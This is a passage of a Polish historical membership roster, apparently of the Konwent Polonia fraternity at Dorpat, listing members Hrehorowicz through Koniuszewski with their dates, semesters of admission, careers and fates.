 435. Wiktor Hrehorowicz, (1862-1922) - s. Władysława (42), brat Tadeusza (662), Antoniego (706) i Jana (787), coetus II sem. 1884, ziemianin z Wileńszczyzny [942]
 436. Władysław Hrehorowicz I, (1813 - przed 1889) -s. Józefa, ziemianin, coetus II sem. 1832 [42]
 437. Władysław Hrehorowicz II, (1831- przed 1889) - s. Karola, brat Aleksandra (325), coetus II sem. 1848, ziemianin z pow. słuckiego [326]
 438. Witold Talko-Hryncewicz, (1826 - przed 1889) - s. Józefa, ziemianin, coetus I sem. 1847, za powst. 1863 r. zesłany [284]
 439. Ludwik Hrynkiewicz-Sudnik, (1902- ?) - coetus II sem. 1927/28 [1421]
 440. Władysław Hulanicki, (1861 - po 1902)- s. Gracjana, coetus II sem. 1882, lekarz w Petersburgu [880]
 441. Jan Hussarowski, (1813 - ?) - s. Aleksandra, brat Leona (119), coetus I sem. 1838, aptekarz w Starym Konstantynowie [132]
 442. Leon Hussarowski, (1812 - 1838) - s. Aleksandra, brat Jana (132), coetus I sem. 1837, zginął w pojedynku [119]
 443. Edward Huszcza, (1824 - 1850) - s. Feliksa, brat Józefa (255) i Leona (263), ziemianin, coetus II sem. 1844 [230]
 444. Józef Huszcza I, (1826 - 1899) - s. Feliksa, brat Edwarda (230) i Leona (119), coetus II sem. 1845, aktywny w powst. 1863 r., ziemianin, pracował w Wil. Banku Ziemskim [255]
 445. Konrad Huszcza, (1872 - 1914) - s. Józefa (255), coetus II sem. 1891, ziemianin z Żmudzi [1072]
 446. Leon Huszcza, (1827 - 1860) - s. Feliksa, brat Edwarda (230) i Józefa (255), coetus I sem. 1846, ziemianin [263]
 447. Józef Huszczo, (1857 - 1933) - s. Stanisława, coetus IIcoetus I sem. 1878 sem. 1878, lekarz - okulista, laryngolog w Białymstoku [797]
 448. Władysław Hutorowicz, (1860 - ?) - z Wileńszczyzny, coetus II sem. 1885, studia medyczne opuścił bez dyplomu [956]
 449. Eugeniusz Iszora, (1889 - 1955) -s. Aleksandra, coetus II sem. 1910, kpt. WP. lekarz - specjalista w dziedzinie odżywiania dzieci [1248]
 450. Ignacy Iwanowski, (1802 - 1886) - s. Hiacynta, coetus II sem. 1828, prawnik, prof., dziekan Uniw. w Petersburgu [17]
 451. Konrad Iwański, (1835 - 1892) - s. Jana, brat Władysława (593), coetus II sem. 1857, od 1870 r. współpracownik Album Academicum Uniw. w Dorpacie [561]
 452. Władysław Iwański, (1841 - 1910) - s. Jana, brat Konrada (561), coetus II sem. 1859, uczestnik powst. 1863 r., ziemianin z gub. kijowskiej [593]
 453. Alfred Izbicki, (1858 - 1912) - s. Aleksandra, coetus II sem. 1880, lekarz zmarł w Odessie [835]
 454. Feliks Jabłczyński, (1865 - 1928) - s. Michała, coetus I sem. 1886, dr chemii, artysta malarz, literat [969]
 455. Aleksander Jabłonowski, (1829-1913) - s. Piotra, brat Juliana (442), coetus I sem. 1849, za powst 1863 r. zesłany, historyk, czł. PAU, dr h.c. Uniw. Lwowskiego [340]
 456. Julian Jabłonowski, (1832 - 1889) - s. Piotra, brat Aleksandra (340), coetus I sem. 1853, lekarz na Wołyniu, Podolu i Ukrainie [442]
 457. Antoni Jabłoński, (1868-1928) - coetus II sem. 1888, w l. 90 XIX w. zakładał w Wilnie tajne biblioteki, w II RP sekretarz Uniw. Warszawskiego [1021]
 458. Olgierd Jacuński, (1900 - 1973) - s. Lucjana, coetus II sem. 1920/21, POW, ochotnik WP (1918 - 23), prokurator Sądu Okr. w Nowogródku [1330]
 459. Władysław Jacynicz, (1835 -?) - coetus II sem. 1856, lekarz w Mińsku Lit. [528]
 460. Aleksander Jagmin, (1822-1865) - s. Michała, brat Augusta (180), coetus II sem. 1840, za powst. 1863 r. zesłany, zm. w Kazaniu [164]
 461. Cezary August Jagmin, (1829 - przed 1889) - s. Michała, brat Aleksandra (164), ziemianin, coetus I sem. 1841 [180]
 462. Ludwik Jagniątkowski, (1847 - ok. 1930) - s. Franciszka, coetus I sem. 1873, lekarz w Kielcach [711]
 463. Zygmunt Jahilnicki, (1886 - ?) - z Wilna, coetus II sem. 1910, nie ukończył studiów med.? [1250]
 464. Ignacy Jakimowicz, (1876 - ?) - z Warszawy, coetus II sem. 1901, lekarz ? [1140]
 465. Antoni Jakowicki, (1849 - 1884) - coetus I sem. 1870, lekarz, zmarł w Chabarowce (Kraj Amurski) [683]
 466. Ksawery Jakowicki, (1842 - 1877) - coetus I sem. 1860, nauczyciel szkolny (m.in. w Częstochowie) [596]
 467. Franciszek Jakszewicz, (1900 - 1968) - Murmańczyk, coetus I sem. 1922/23, ppłk., dyr. sanatorium w Busku [1353]
 468. Paweł Jakubenas, (1871 - 1953) - s. Chrystiana, coetus II sem. 1893, pastor.e.r., prof. Uniw. Witolda Wlk. w Kownie, superintendent Litwy. Uniknął represji bolszewickich emigrując do Szwajcarii [1091]
 469. Marceli Jakubowski, (1864 - ok. 1928) - coetus II sem. 1886, lekarz, w Dęblinie (?) [974]
 470. Stefan Janczewski, (1880 - 1938) - z pow. radzymińskiego, coetus II sem. 1903, lekarz ginekolog w Warszawie [1153]
 471. Stanisław Janikowski, (1833 - 1881) - s. Andrzeja, coetus II sem. 1851, znawca med. sądowej, prof., dziekan UJ, członek PAU [401]
 472. Teodor Jankiewicz, (1821 - ok. 1860) - z Wileńszczyzny, coetus I sem. 1840, emigrant [163]
 473. Henryk Jankowski, (1886 - 1948) - coetus II sem. 1909, naczelny lekarz więzienny Min. Sprawiedliwości [1235]
 474. Piotr Paweł Jankowski, (1862 - 1926) - s. Tomasza, coetus I sem. 1886, lekarz w Kielcach [966]
 475. Ryszard Jankowski, (1906 - 1980) - coetus I sem. 1926/27, zmarł w Sopocie [1402]
 476. Władysław Jankowski, (1867 - 1950) - coetus II sem. 1889, ziemianin w woj. lubelskim [1044]
 477. Kazimierz Janowski, (1873 - 1950) - s. Józefa, coetus II sem. 1895, lekarz w Kaliszu [1106]
 478. Stanisław Janowski, (1831 - 1881) - s. Wincentego, brat Stefana (357), coetus I sem. 1850, urzędnik, więziony za powst. 1863 r. [365]
 479. Stefan Janowski, (1828 - 1891) - s. Wincentego, brat Stanisława (365), ziemianin, coetus I sem. 1850, urzędnik Kolei Warszawsko - Petersburskiej [357]
 480. Jan Januszewski, (1831 - ok. 1870) - ziemianin z gub. kowieńskiej, coetus II sem. 1850, za powst. 1863 r. zesłany [367]
 481. Placyd Januszewski, (1814 - ?) - uczestnik konspiracji studenckiej w Wilnie, coetus II sem. 1841, lekarz [196]

  Tadeusz Januszewski, 1921 r.

 482. Tadeusz Januszewski, (1899 - po 1939) - coetus II sem. 1919/20, prac. Banku Polskiego Wilno [1320]

 483. Witold Januszkowski, (1891- 5 kwietnia 1970 w Toruniu) - s. Mikołaja, coetus II sem. 1908, Skarbnik Koła Fil. w Wilnie. W l. 1917 - 1918 w Korpusie gen. Dowbór-Muśnickiego. W wojnie z bolszewikami w Sądzie Polowym II Armii. Mjr WP. Pełnił szereg funkcji sądowniczych (w Wilnie, Brześciu, Pińsku). W kampanii wrześniowej szef Sądu Polowego nr 92. W niewoli niemieckiej w oflagach (Hadamar, Grossborn, Sandbostel). Wrócił do kraju w 1947 r. - adwokat w Pasłęku. Odznaczony m.in. Virtuti Militari, Krzyżem Walecznych (dwukrotnie) [1222]
 484. Stanisław (Dąbrowa-) Januszewicz, (1901 - 1943) - olderman stulecia, ochotnik WP (1919 - 21), coetus II sem. 1922/23, pracownik Wil. Banku Ziemskiego, Zamordowany (spalony) przez partyzantów sowieckich [1357]
 485. Władysław Jarecki, (1876-1929) - coetus II sem. 1907, w czasie I wojny przewodniczący Komitetu Wykonawczego Polskich Organizacji Wojskowych na Kaukazie. Kpt. WP (1919-20). Dyrektor Instytutu Ociemniałych i Głuchoniemych w Warszawie, wydawca „Neurologii Polskiej” [1207]
 486. Franciszek Jarniński, (1873 - ?) - s. Adama, coetus II sem. 1895, lekarz w Warszawie [1108]
 487. Stanisław Jaroszewicz, (22 czerwca 1911 w Witebsku - 16 września 1971 w Sopocie) s. Władysława i Marii Doronowównej, zięć Jana Kossko (Sarmacja), absolwent Gimnazjum Zygmunta Augusta w Wilnie 1932, student student prawa USB 1932-39, c. I sem. 1933/34, sekretarz sem. zim. 1936/37, olderman sem. zim. 1937/38, prezes sem. let. 1937/38, olderman sem. zim. 1938/39, członek Stronnictwa Narodowego, w czasie okupacji ppor. AK w “Wachlarzu” i w „Kedywie” w Wilnie, uczestnik wielu akcji bojowych, odznaczony Krzyżem Walecznych, w powstaniu warszawskim w Batalionie “Czata 49″, po wojnie w Gdańsku, pracował w PCK, w podziemiu 1945-46, aresztowany przez UB, w więzieniu 1946-47, później prezes Spółdzielni “Autoremont”, zmarł w wyniku wypadku trolejbusowego, pochowany na cmentarzu katolickim w Sopocie (V, 763) [nr ew. 1474]
 488. Konstanty Jaroszyński, (1816 - 1843) - s. Jana, ziemianin, coetus II sem. 1833 [54]
 489. Ignacy Jasieński, (1832 - 1866) - ziemianin z gub. wileńskiej, coetus I sem. 1851 [383]

  Jerzy Jasieński, Warszawa 2007 r.

 490. Jerzy Jasieński, (25 maja 1913 we Władykawkazie - 7 grudnia 2008 w Warszawie) - s. Władysława, coetus I sem. 1938/39, muzyk, żołnierz AK. Po wojnie m.in. dyr. Pomorskiej Orkiestry Symfonicznej (Bydgoszcz), dyr. i kier. artystyczny Teatru Polskiego (1964), Teatru Wielkiego (1966) w Warszawie, krytyk i publicysta muzyczny [1507] Szerzej vide nekrolog: Aktualności 2008

 491. Rudolf Julian Jasieński, (1820 - ?) - ziemianin, coetus I sem. 1839, ostatni senior Konwentu przed zdjęciem barw w 1843, urzędnik [153]
 492. Stanisław Jasieński, (1896 - po 1940) - s. Stanisława, coetus II sem. 1916, pierwszy olderman „wileński”. Ochotnik WP 1920, ziemianin, aresztowany w 1940 r., wywieziony wraz z rodziną do ZSRR - dalsze losy nieznane [1304]
 493. Jakub Jasiński, Jakub Jasiński (1854 - ?) - z gub. kowieńskiej, coetus I sem. 1879 [806]
 494. Zbigniew Jasiński, (1888 - 1948) - s. Edwarda, Czł. Komisji do rewizji praw Konwentu (1908), Komisji do ułożenia kartelu z Arkonią (1909). Z jego inicjatywy i w jego mieszkaniu w Wilnie na zebraniu 19 XII 1919 r., zdecydowano o przeniesieniu K! do Wilna. Jeden z twórców Wil. Koła Filistrów (1922). Członek POW. Prezes Wil. Oddz. Zw. Adwokatów Polskich. Współred. wil. wyd. „Rzeczpospolitej”. Polityk prawicowy, zostawił wspomnienia. [1203]
 495. Jan Jaskłowski, (1882 - po 1928) - z Mnichowa pow. ostrowski, coetus I sem. 1908 [1212]
 496. Konstanty Jastrzębski, (1845 - po 1882) - brat Włodzimierza (627), coetus I sem. 1865, dyr. kolei Rybinsk-Bołogoje i dyr. Tow. Kolei Konnych w Petersburgu [626]
 497. Michał Jastrzębski I, (1859 - 1938) - s. Stanisława, coetus II sem. 1879, pastor e.r. superintendent generalny Jednoty Litewskiej, przemawiał w czasie uroczystej mszy na stuleciu „Polonii” [822]
 498. Michał Jastrzębski II, (1872 - 1930) - coetus II sem. 1890, ziemianin, Prezes Pol. Tow. Łowieckiego, czł. Zarządu sp. akc. Drzewnego Przemysłu i Handlu, Współzałożyciel głośnej spółki „Len Polski” [1059]
 499. Stanisław Jastrzębski, (1846 - po 1913) - coetus II sem. 1866, wicedyrektor Departamentu Kolei Żelaznych (w Petersburgu) [645]
 500. Włodzimierz Jastrzębski, (1843 - po 1884) - brat Konstantego (626), coetus I sem. 1865, kierownik w Dyrekcji Kolei Orenburskiej w Petersburgu [627]
 501. Henryk Jawłowski, (1837 - ?) - z Kowieńszczyzny, coetus II sem. 1856, studiował fizykę [530]
 502. Franciszek Jawnis, (1859 - ?) - z gub. kowieńskiej, coetus II sem. 1884, lekarz [931]
 503. Albert Jawniszko, (1863 - 1941) - lekarz, coetus II sem. 1887, w Malatach, Litwa [1013]
 504. Jerzy Jazdowski Dąbrowa, (1912 - 1994) - coetus I sem. 1935/36 [1492]
 505. Urban Jazdowski, (1848 - ?) - z Wileńszczyzny, coetus II sem. 1866 [641]
 506. Maciej (Mateusz) Jeleński, (1817 - 1858) - s. Jerzego, brat Ottona (103), ziemianin, coetus I sem. 1835 [88]
 507. Mieczysław Jeleński, (1834 - 1902) - s. Kazimierza, ziemianin z gub. wileńskiej, coetus II sem. 1852 [436]
 508. Otton Jeleński, (1819 - ?) - s. Jerzego, brat Macieja (88), coetus II sem. 1836, urzędnik [103]
 509. Władysław Jeleński, (1818 - po 1889)- s. Kazimierza, coetus I sem. 1837, uczestnik spisku K. Hildebrandta, emigrant, marynarz [117]
 510. Aleksander Jelliński, (1854 - ?) - brat Jana (736), z Połtawy, nauczyciel progimnazjum w Homlu [737]
 511. Jan Jelliński, (1857 - ?) - brat Aleksandra (737), z Połtawy, coetus II sem. 1875 [736]
 512. Aleksander Jelski, (1816 - po 1865) - ziemianin, coetus II sem. 1833, urzędnik w Wilnie, za powst. 1863 r. skazany na konfiskatę majątku [56]
 513. Aleksander Jełowicki, (1856 - 1889) - s. Eustachego, coetus II sem. 1876, dr praw, ziemianin z Podola, właściciel wielkiej cukrowni [750]
 514. Edward Jełowiecki, (1838 - ?) - s. Pawła, ziemianin w gub. wołyńskiej, coetus II sem. 1858 [576]
 515. Wacław Jezierski, (1868 - 1928) - s. Feliksa, coetus II sem. 1890, geograf, przyrodnik, pedagog. Czł. Komisji Geograficznej PAU. Wizytator ministerialny szkół średnich. Autor podręczników. Redaktor „Przyrody” [1063]
 516. Kazimierz Jocz, (1815 - 1837) - z Grodzieńszczyzny, coetus I sem. 1834, zmarł w czasie studiów [74]
 517. Karol Jonscher, (1809 - 1887) - coetus II sem. 1832, pastor e.a. w Lublinie [39]
 518. Kazimierz Jotejko, (1859 - ?) - z Ukrainy, coetus II sem. 1887 [1010]
 519. Wacław Józefowicz, (1889-1954) - s. Dariusza, coetus II sem. 1909, w 1938 r. dyr. Towarzystwa Chargeurs Réunis, SGT Fabre Line & French Line (W-wa) [1243]
 520. Czesław Jundziłł, (1898 - 7 kwietnia 1970) - s. Konstantego, ochotnik WP (1918 - 20), coetus II sem. 1921/22, ziemianin, aresztowany przez NKWD, wywieziony. Wyszedł z ZSRR z II Korpusem. Walczył w Italii. Po wojnie prac. fizyczny w Londynie [1342]
 521. Hipolit Jundziłł, (1846 -1898) - s. Adama, coetus II sem. 1866, znakomity chirurg wileński, ogromnie nowatorski [642]
 522. Edward Jurgens, (1824 - 1863)- s. Henryka, coetus I sem. 1845, lider tzw. „millenerów”. Zmarł w celi X Pawilonu Cytadeli [244]
 523. Grzegorz Kaczkowski, (1829 - 1866) - s. Michała, coetus I sem. 1856, lekarz na Podolu [520]
 524. Karol Kaczkowski, (1827 - 1896) - spiskowiec w Organizacji 1848 r., coetus I sem. 1849, coetus I sem. 1849, lekarz, udział w powst. 1863 r. [332]
 525. Zygmunt Kaczkowski, (1833 - 1863) - s. Karola, coetus I sem. 1855, zmarł wkrótce po studiach [505]
 526. Stanisław Kaczyński, (1912 - po 1978 ?) - s. Antoniego, coetus II sem. 1938/39, ostatni wileński fuks. Po wojnie w Gdańsku, wyemigrował do USA [1511]
 527. Andrzej Kader, (1831 - 1901) - coetus I sem. 1855, pastor e.r., generalny superintendent Jednoty Litewskiej (w Wilnie) [502]
 528. Bronisław Kader, (1863 - 1937) - s. Andrzeja (502), coetus II sem. 1881, chirurg, prof. i dziekan U.J., Filister honoris casua Vesalii [859]
 529. Władysław Kalenkiewicz, (1864 - po 1922) - s. Jana, coetus II sem. 1884, lekarz w Grodnie i Białymstoku [930]
 530. Aleksander Kaleński, (1837 - ?) - s. Narcyza, coetus I sem. 1857, studiował astronomię [556]
 531. Jan Kamieński, (1835 - ?) - s. Atanazego, coetus II sem. 1857, lekarz w Moskwie [567]
 532. Franciszek Kamiński, (1824 - przed 1889) - coetus II sem. 1851, lekarz w Moskwie [406]
 533. Gabriel Marian Karaffa-Korbutt, (1862 - 1936) - s. Józefa, coetus I sem. 1888, historyk literatury, językoznawca, bibliograf, autor: Literatura polska (t. I - III, 1917 - 21; wyd. 2: t. 1-IV, 1929 - 31), członek PAU, prof., dziekan w Wolnej Wszechnicy Polskiej [1018]
 534. Ludwik Karnicki, (1904 - 19 lipca 1977 w Krakowie) s. Antoniego i Aleksandry z Barańskich (senator i posłanki PSL Wyzwolenie z okręgu wileńskiego), kuzyn Feliksa (Welecja), absolwent gimnazjum w Wilnie, student USB, a następnie student i absolwent ekonomii UP, c. II sem. 1921/22 [nr ew. 1348], ziemianin, pracownik Państwowego Banku Rolnego, w oddziałach w Lublinie, Warszawie, Krakowie i Katowicach, a później w instytucjach przemysłowych i Instytucie Fizyki Jądrowej PAN w Krakowie, pochowany na cmentarzu na Batowicach w Krakowie

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Aleksandra Kopińskiego]

 535. Franciszek Karniewski, (1876 - 1954) - s. Juliana, coetus II sem. 1898, lekarz w Sobieniach - Jeziorach k. Otwocka [1116]
 536. Jan Karoli, (1867 - 1908) - s. Aleksandra, coetus II sem. 1886, nauczyciel, popularyzator nauki w Warszawie [971]
 537. Benedykt Karp, (1857 - 1926) - s. Franciszka, brat Maurycego (854), coetus I sem. 1880, ziemianin z Kowieńszczyzny [833]
 538. Maurycy Karp, (1858 - 1905) - s. Franciszka, brat Benedykta (833), coetus I sem. 1881, ziemianin z Kowieńszczyzny, napadnięty przez bandytów w swym majątku na Żmudzi, zmarł wkrótce w wyniku odniesionych ran [854]
 539. Zygmunt Karpowicz, (1863 - ?) - z Mohylewszczyzny, coetus I sem. 1886, lekarz ? [963]
 540. Seweryn Karpuszko, (1845 - po 1887) - coetus I sem. 1863, emigrant po powstaniu 1863 r., uczeń w Szkole Wojskowej École Spéciale Militaire de Saint-Cyr, później inżynier we Lwowie, autor: “O drenowaniu roli” (1887 r.) [619]
 541. Michał Kasperowicz, (1863 - ?) - coetus II sem. 1889, lekarz w Kownie [1049]
 542. Konstanty Kaszyc, (1819 - 1881) - s. Józefa, coetus I sem. 1838, za powstanie 1863 r. zesłany, pamiętnikarz [133]
 543. Mikołaj Kaszyn, (28 kwietnia 1895 w Rydze - 28 stycznia 1977 w Zakopanym) s. Wiaczesława (lekarza) i Emilii z Żółkowskich, absolwent klasycznego gimnazjum Aleksandrowskiego w Rydze 1913, student med. UD 1913-18, c. II sem. 1913, olderman 1917, wiceprezes i olderman 1918, inicjator utworzenia filii Polonii w Poznaniu 1921. ochotnik WP 1918-20, ppor,po dwuch latach praktyki lekarskiej wstąpił do Miejskiej Szkoły Dramatycznej w Krakowie (1921), a następnie na Wydziale Dramatycznym Konserwatorium Muzycznego w Poznaniu (1923), aktor na scenach Poznania, Grudziądza, Płocka i Warszawy, później pracownik radia, spiker, pierwszy kierownik Działu Programowego Radia, w 1925 reżyserował pierwsze słuchowisko “Warszawiankę” S. Wyspiańskiego, współredaktor dwutygodnika “Radjofon Polski” oraz “Radjo-Amator”, od końca 1926 urzędnik, w czasie powstania warszawskiego w cywilnej służbie sanitarnej Śródmieście-Południe, punkt przy ul. Wspólnej 5, a także w szpitalu przy ul. Żurawiej 31 (poza tym okresem praktycznie nie wykonywał zawodu lekarza), odznaczony Krzyżem Walecznych, po wojnie osiadł w Zakopanym, kierownik Wydziału Kultury i Sztuki, inspirator powstania Towarzystwa Miłośników Ludowej Kultury i Sztuki Góralskiej 1957, pochowany na cmentarzu przy ul. Nowotarskiej w Zakopanym [nr ew. 1283]
 544. Bronisław Kątkowski, (1887 - 1919) - coetus II sem. 1904, lekarz, był w kierownictwie POW na Kresach - zamordowany przez bolszewików 19 VIII w Kalenkowiczach (Mińszczyzna) [1163]
 545. Włodzimierz Kenig, (1883 - 1928) - s. Józefa, coetus I sem. 1907, skrzypek, dyrygent, kompozytor, krytyk teatralny i muzyczny, prawnik. W l. 1915 - 16 dyr. i dyrygent Filharmonii Warszawskiej. Notariusz w Pułtusku [1179]
 546. Julian Kępiński, (1808 - po 1852?) - założyciel Konwentu Polonia, uczestnik powst. listop., emigrant, lekarz [8]
 547. Roman Kępiński, (1813 - 1853) - coetus II sem. 1832, bibliotekarz Instytutu Górniczego w Petersburgu [43]
 548. Hieronim Kieniewicz, (1830 - 1911) - s. Hieronima, ziemianin, coetus I sem. 1847, marszałek szlachty pow. mozyrskiego [274]
 549. Andrzej Kiersnowski, (1862 - 1894) - s. Apolinarego (109), brat Józefa (824), coetus II sem. 1886, lekarz w Wilnie [985]
 550. Apolinary Kiersnowski, (1817 - po 1889) - s. Józefa, coetus I sem. 1837, uczestnik spisku K. Hildebrandta, zesłany [109]
 551. Józef Kiersnowski, (1857 - 1932?) - s. Apolinarego (109), brat Andrzeja (985), coetus II sem. 1879, astronom, dyr. P. Zakł. Graficznych W-wa [824]
 552. Zygmunt Kiersnowski, (1853 -1914) - s. Władysława, ojciec Kazimierza i dziadek Juliana (Welecja), coetus II sem. 1877, prawnik, w l. 1907-1914, przewodniczący ryskiej „grupy prowincjonalnej”, notariusz w Rydze [764]
 553. Witold Kiewlicz, (1903 - 27 października 1993) - s. Mariana, coetus II sem. 1927/28, ochotnik WP (1919 - 20), kampania wrześniowa, internowany na Litwie, wrócił do Wilna, ppor. AK (odzn. Krzyżem Walecznych), aresztowany w 1943 r. (wśród 100 zakładników) - wykupiła go żona. Aresztowany w styczniu 1945 r. wywieziony do Workuty. W 1947 r. wrócił do kraju [1420]
 554. Witold Kieżun, (1892-1931) - s. Józefa, coetus I sem. 1912, lekarz, ochotnik WP (1919 - 1922), kpt. WP. Lekarz Kasy Chorych w Wilnie [1263]
 555. Wojciech Kieżun, (1904 - 1968) -s. Wojciecha, coetus I sem. 1926/27, pracownik Wil. Banku Ziemskiego, po wojnie urzędnik w Min. Finansów [1403]
 556. Michał Kimontt, (1870 - 1919) - s. Piotra, coetus II sem. 1889, lekarz, naczelny ordynator w szpitalu miejskim w Tbilisi. Zmarł w Konstantynopolu, w drodze do kraju [1041]
 557. Ludwik Kirchheim, (1799 - 1832) - z Królestwa Polskiego, student medycyny, coetus II sem. 1830, zmarł w czasie studiów [31]
 558. Karol Kirst, (1885 - 1953) - s. Edwarda, coetus I sem. 1909, w czasie I wojny św. w Odessie -kierownik Wydz. Kult. Ośw. Polskiego Tow. Pomocy Ofiarom Wojny. W 1918 wrócił do kraju, pełnił szereg funkcji sądowniczych. W 1926 r. dyr. Dep. Politycznego MSW, wojewoda Białostocki (1927 - 1930), prokurator Sądu Najwyższego [1227]
 559. Witold Kisiel, (1909 -1973) - s. Feliksa, ochotnik WP (1919 - 20), coetus II sem. 1927/28, brał udział w kampanii wrześniowej, wrócił do Wilna, por. AK (ps. „Światołdycz”), d-ca 23 Bryg. Bracławskiej Okręgu Wil., aresztowany w 1944, wywieziony do obozu NKWD w Riazaniu. Wrócił w 1947 r., osiadł na Wybrzeżu [1419]
 560. Edward Klasse, (1900-1959) -s. Oktawiana brat Oda (1315), ochotnik WP (1918-20)- Krzyż Walecznych, coetus II sem. 1920/21. Przed wojną dyr. w Compania Colonizadora International SA. w Boliwii, po wojnie miał w Caracas sklep spożywczy [1333]
 561. Odo-Oktawian Klasse, (1898 - 1963) - s. Oktawiana, brat Edwarda (1333), ochotnik WP (1918 - 21), coetus II sem. 1919/20, v. - prez. Sądu Okręgowego w Grodnie [1315]
 562. Igor Klatzo, (1916 - 2007) - s. Jerzego, coetus I sem. 1935/36, lekarz w AK (Wilno), po wojnie w USA - autorytet w badaniach nad patofizjologią mózgu [1490]
 563. Karol Klecki, (1866 - 1931) - s. Waleriana, brat Waleriana (1007), coetus II sem. 1885, lekarz, prof., dziekan, U.J., członek PAU - wybitny patolog, opracował podręcznik Patologia ogólna (t. 1 Kr. 1928, t. 2 Kr. 1935 - pośmiertnie) [958]
 564. Stefan Klecki, (1877 - 1922) -s. Andrzeja, coetus II sem. 1901, lekarz, zm. w Słonimiu [1135]
 565. Walerian Klecki, (1867 - 1920) - s. Waleriana, brat Karola (958), coetus II sem. 1887, prof., dziekan U.J., autorytet w dziedzinie hodowli zwierząt i mleczarstwa [1007]
 566. Bronisław Kleczyński, (1821 - ?) - s. Antoniego, ziemianin z Wołynia, coetus I sem. 1841 [184]
 567. Oskar Kleindienst, (1862 - 1913) - coetus II sem. 1883, pastor e.a. w Płocku [916]
 568. Emil Kliem, (1847 - 1883) - s. Karola, coetus II sem. 1865, pastor e.a. w Łodzi [637]
 569. Euzebiusz Kliem, (1841 - po 1877) - coetus I sem. 1862, nauczyciel gimn., od 1877 w warszawskim Seminarium Nauczycielskim [609]
 570. Aleksander Kłobukowski, (1820-1903) - s. Józefa, coetus I sem. 1840, działacz i pisarz gospodarczy, dyplomata, powstaniec 1863 r. [161]
 571. Michał Knipowicz, (1815 - po 1882) - s. Michała, coetus II sem. 1840, lekarz wojskowy w Finlandii [165]
  Herman Gustaw Knothe.

 572. Herman Gustaw Knothe, (29 kwietnia 1850 w Tomaszowie Mazowieckim - 27 października 1916 w Tomaszowie Mazowieckim) s. Tobiasza i Amalii Roesner, stryj (?) Karola (Konwent Polonia), student teologii ewangelickiej w Dorpacie, coetus I sem. 1873, ordynowany 1891 w Tomaszowie, pastor e.a. w Węgrowie, Tomaszowie Maz., Łodzi [714]

 573. Karol Robert Knothe, (26 lipca 1873 w Tomaszowie Mazowieckim - 14 października 1935 w Berlinie) - syn Karola i i Idy Hentschke, bratanek (?) Hermana (Konwent Polonia), coetus II sem. 1895, lekarz [1107]
 574. Erazm Kobielski, (1827 - przed 1889) - s. Jana, coetus I sem. 1853, nauczyciel gimn. w Dorpacie [447]
 575. Przemysław Kobierzycki, (1859 - przed 1889) - s. Jarosława, coetus II sem. 1877, mieszkał w Kaliszu [767]
 576. Antoni Kobyliński, (1823 - 1880) - coetus I sem. 1845, lekarz, ziemianin [241]
 577. Lucjan Kobyliński, (1912- 1943) - coetus I sem. 1935/36, skreślony przez oldermana, za pożyczenie dekla koledze na egzamin. Żołnierz września, przedostał się na Zachód, służył w lotnictwie, zmarł na gruźlicę [1488]
 578. Oskar Kobyliński, (1856 - po 1887) - s. Antoniego (241), coetus II sem. 1877, lekarz, ziemianin w Inflantach, podróżnik [773]
 579. Rudolf Kobyliński, (1819 - przed 1889) -s. Stanisława, ziemianin, coetus I sem. 1839, urzędnik. [151]
 580. Józef Kochanowski, (1836 - ?) - coetus I sem. 1859, mieszkał w Wilnie [584]
 581. Kazimierz Kociełł, (1862 - 1909) - z Wilna, coetus II sem. 1883, studiów medycznych nie ukończył, administrator majątków Władysława Druckiego-Lubeckiego (970) [903]
 582. Kazimierz Kodź, (1887 - 1951) - coetus II sem. 1908, Sekretarz Wil. Koła Fil. Lekarz, kierownik Pogotowia Ratunkowego w Wilnie, po wojnie ordynator w Szpit. Wojewódzkim w Olsztynie [1224]
 583. Jan Koeller, (1845 - ?) - coetus II sem. 1866, urzędnik telegrafu w Moskwie [649]
 584. Stanisław Kognowicki, (1863-1941) - coetus I sem. 1888, ziemianin, Prezes Wil. Koła Filistrów (do 1939 r.), polityk konserwatywny, prezes Wileńskiego Prywatnego B-ku Handl. [1019]
 585. Józef Kokeli, (1835 - 1907) - s. Augusta, ojciec Józefa (Welecja), dziadek Tadeusza i Zygmunta Kokeli (Welecja), coetus II sem. 1854, współpracownik E. Jurgensa, adwokat, obrońca w procesie „Proletariatczyków”. W 1907 r. współzałożyciel Towarzystwa b. Wychowanków Uniwersytetu w Dorpacie. [494]
 586. Roman Koiszewski (Kojszewski), (1818 - ?) - ziemianin z guberni grodzieńskiej, coetus I sem. 1841 [187]
 587. Jan Kołodziejski, (1882 - 1940) - s. Pawła, coetus II sem. 1901, lekarz, mjr WP. Brał udział we wszystkich powst. śląskich. W niewoli sowieckiej w Starobielsku, zamordowany w Charkowie - ofiara zbrodni katyńskiej [1136]
 588. Władysław Kołysza, (1835 - 1861) - coetus I sem. 1858, nauczyciel gimn. w Słucku [573]
 589. Antoni Piotr hr. Komorowski, (16 września 1833 w Suwejniszkach - 11 maja 1881 w miejsc. Kurmen), herbu Korczak, s. Antoniego i Doroty z Grotkowskich, brat Wiktora (535) i Piotra Jana (542), ojciec Jarosława Jana i Szymona Stanisława, dziadek Wacława (wszyscy trzej Arkonia), ziemianin z gub. kowieńskiej na Skrobiszkach i ordynat na Kurmen, c. I sem. 1853 [nr ew. 448]
 590. Jan Leopold hr. Komorowski, (31 marca 1833 w Gikajnie - 29 lutego 1904 w Gikajnie) herbu Korczak, s. Onufrego, ziemianin gub. kowieńskiej, c. I sem. 1854 [nr ew. 481]
 591. Piotr Jan hr. Komorowski, (6 stycznia 1838 w Wilnie - 3 września 1905 w maj. Radkuny) herbu Korczak, s. Antoniego i Doroty z Grotkowskich, brat Antoniego (438) i Wiktora (535), ziemianin w gub. Kowieńskiej w maj. Radkunach i maj. Kurmen, c. I sem. 1857 [nr ew. 542]
 592. Wiktor Franciszek Daniel hr. Komorowski, (21 lipca 1835 w Radkunach - 17 listopada 1871) herbu Korczak, s. Antoniego i Doroty z Grotkowskich, brat Antoniego (448) i Piotra Jana (542), ziemianin gub. kowieńskiej, c. I sem. 1857, sędzia [nr ew. 535]
 593. Józef Kon, (1809 - 1833) - z Kalisza, student medycyny, coetus II sem. 1832, zmarł w czasie studiów [41]
 594. Władysław Konarski, (1822 - 1848) - coetus I sem. 1846, zmarł będąc studentem [264]
 595. Adam Kuncewicz, (1852 - 1911) - coetus II sem. 1870, nauczyciel (m.in. w Wilnie) [680]
 596. Adam Konczewski, (1829 - ?) - s. Antoniego, coetus II sem. 1848, nauczyciel gimn. w Nieżynie i Lublinie [312]
 597. Adam Koniuszewski, (1830 - 1869) - coetus I sem. 1853, lekarz w Rzeżycy [449]
